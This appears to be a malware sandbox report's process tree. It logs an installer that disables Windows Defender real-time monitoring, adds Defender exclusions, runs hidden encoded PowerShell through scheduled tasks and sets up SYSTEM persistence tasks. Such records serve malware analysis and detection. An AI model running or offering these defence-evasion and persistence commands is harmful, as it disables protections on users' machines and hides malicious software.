PID 2484 wrote to memory of 1624 2484 cmd.exe 37 PID 2484 wrote to memory of 1624 2484 cmd.exe 37 PID 2484 wrote to memory of 1624 2484 cmd.exe 37 PID 2484 wrote to memory of 1624 2484 cmd.exe 37 PID 2484 wrote to memory of 1624 2484 cmd.exe 37 PID 2484 wrote to memory of 1624 2484 cmd.exe 37 PID 2484 wrote to memory of 1624 2484 cmd.exe 37 PID 2508 wrote to memory of 2732 2508 cmd.exe 39 PID 2508 wrote to memory of 2732 2508 cmd.exe 39 PID 2508 wrote to memory of 2732 2508 cmd.exe 39 PID 2508 wrote to memory of 2732 2508 cmd.exe 39 PID 2508 wrote to memory of 2732 2508 cmd.exe 39 PID 2508 wrote to memory of 2732 2508 cmd.exe 39 PID 2508 wrote to memory of 2732 2508 cmd.exe 39 PID 2484 wrote to memory of 2932 2484 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe"C:\Users\Admin\AppData\Local\Temp\3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Users\Admin\AppData\Local\Temp\7zS848B.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Users\Admin\AppData\Local\Temp\7zS865F.tmp\Install.exe.\Install.exe /Tndidsl "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2484 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1624
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2932
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2508 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2548
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2732
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJJOOkTaT" /SC once /ST 00:05:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2332
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gJJOOkTaT"4⤵PID:2436
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJJOOkTaT"4⤵PID:1556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bRiKnmLOZFdkMPGuzv" /SC once /ST 01:18:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR\SNvmPmIhBpGbmlc\qazedFF.exe\" Gy /aNsite_idPFd 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2500
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {DEE77C78-46B5-4C2E-9A1F-71D17979BCCE} S-1-5-21-2085049433-1067986815-1244098655-1000:AHLBRYJO\Admin:Interactive:[1]1⤵PID:1412
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:3036
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1996 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:524
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:956 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1940
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:948 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1708
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1524
-
C:\Windows\system32\taskeng.exetaskeng.exe {C1D8AB96-2139-40D9-B73A-74F0615EDC71} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2788
-
C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR\SNvmPmIhBpGbmlc\qazedFF.exeC:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR\SNvmPmIhBpGbmlc\qazedFF.exe Gy /aNsite_idPFd 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2324 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gLHmUmRPF" /SC once /ST 00:02:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1124
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gLHmUmRPF"3⤵PID:1984
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gLHmUmRPF"3⤵PID:1932
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1776
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:980
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:2812
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnCRqsJRL" /SC once /ST 00:44:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnCRqsJRL"3⤵PID:1536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gnCRqsJRL"3⤵PID:708
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\qMfgxxkvaFNxVGCk" /t REG_DWORD /d 0 /reg:323⤵PID:1672
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\qMfgxxkvaFNxVGCk" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\qMfgxxkvaFNxVGCk" /t REG_DWORD /d 0 /reg:643⤵PID:1404
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\qMfgxxkvaFNxVGCk" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1876
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\qMfgxxkvaFNxVGCk" /t REG_DWORD /d 0 /reg:323⤵PID:1964
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\qMfgxxkvaFNxVGCk" /t REG_DWORD /d 0 /reg:324⤵PID:3008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\qMfgxxkvaFNxVGCk" /t REG_DWORD /d 0 /reg:643⤵PID:1568
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\qMfgxxkvaFNxVGCk" /t REG_DWORD /d 0 /reg:644⤵PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\qMfgxxkvaFNxVGCk\kKwPjvfx\bCygsbhMwkigDncK.wsf"3⤵PID:2980
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\qMfgxxkvaFNxVGCk\kKwPjvfx\bCygsbhMwkigDncK.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2568 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUszDIIxU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUszDIIxU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:3016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FncWqVonEAflrVaxqNR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FncWqVonEAflrVaxqNR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjchgTxaUtSoC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjchgTxaUtSoC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\abetkicELaUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\abetkicELaUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rFkCZBmYGfkU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rFkCZBmYGfkU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\TtwSUYpchTTJbcVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\TtwSUYpchTTJbcVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\qMfgxxkvaFNxVGCk" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\qMfgxxkvaFNxVGCk" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUszDIIxU" /t REG_DWORD /d 0 /reg:324⤵PID:2500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUszDIIxU" /t REG_DWORD /d 0 /reg:644⤵PID:1152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FncWqVonEAflrVaxqNR" /t REG_DWORD /d 0 /reg:324⤵PID:2280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FncWqVonEAflrVaxqNR" /t REG_DWORD /d 0 /reg:644⤵PID:2004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjchgTxaUtSoC" /t REG_DWORD /d 0 /reg:324⤵PID:2092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjchgTxaUtSoC" /t REG_DWORD /d 0 /reg:644⤵PID:268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\abetkicELaUn" /t REG_DWORD /d 0 /reg:644⤵PID:2368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\abetkicELaUn" /t REG_DWORD /d 0 /reg:324⤵PID:3064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rFkCZBmYGfkU2" /t REG_DWORD /d 0 /reg:324⤵PID:2008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rFkCZBmYGfkU2" /t REG_DWORD /d 0 /reg:644⤵PID:2380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\TtwSUYpchTTJbcVB" /t REG_DWORD /d 0 /reg:324⤵PID:1716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\TtwSUYpchTTJbcVB" /t REG_DWORD /d 0 /reg:644⤵PID:1052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:1488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR" /t REG_DWORD /d 0 /reg:324⤵PID:2124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR" /t REG_DWORD /d 0 /reg:644⤵PID:1612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\qMfgxxkvaFNxVGCk" /t REG_DWORD /d 0 /reg:324⤵PID:1444
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\qMfgxxkvaFNxVGCk" /t REG_DWORD /d 0 /reg:644⤵PID:764
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnXrFZsCX" /SC once /ST 00:49:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnXrFZsCX"3⤵PID:1632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gnXrFZsCX"3⤵PID:2212
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2036
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2220
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2300
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ULPYamQDIjWIhTUbi" /SC once /ST 00:45:19 /RU "SYSTEM" /TR "\"C:\Windows\Temp\qMfgxxkvaFNxVGCk\lXXVCSOPWGZMZyR\nYdlgIy.exe\" Rg /Qesite_idYxu 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2992
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ULPYamQDIjWIhTUbi"3⤵PID:816
-
-
-
C:\Windows\Temp\qMfgxxkvaFNxVGCk\lXXVCSOPWGZMZyR\nYdlgIy.exeC:\Windows\Temp\qMfgxxkvaFNxVGCk\lXXVCSOPWGZMZyR\nYdlgIy.exe Rg /Qesite_idYxu 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2452 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bRiKnmLOZFdkMPGuzv"3⤵PID:1628
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2480
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:2732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:2496
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:2592
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\EUszDIIxU\QVuGnf.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "PyTaEsvcdFypYsh" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2340
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PyTaEsvcdFypYsh2" /F /xml "C:\Program Files (x86)\EUszDIIxU\CkQMJih.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "PyTaEsvcdFypYsh"3⤵PID:2176
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PyTaEsvcdFypYsh"3⤵PID:2032
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WwyRNVlKozxkMR" /F /xml "C:\Program Files (x86)\rFkCZBmYGfkU2\agqJRfp.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:3032
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OTILkGDakfAsN2" /F /xml "C:\ProgramData\TtwSUYpchTTJbcVB\buDoakR.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2996
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GWxyEmjyURDtQJJTe2" /F /xml "C:\Program Files (x86)\FncWqVonEAflrVaxqNR\xBjraHV.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2468
-
-
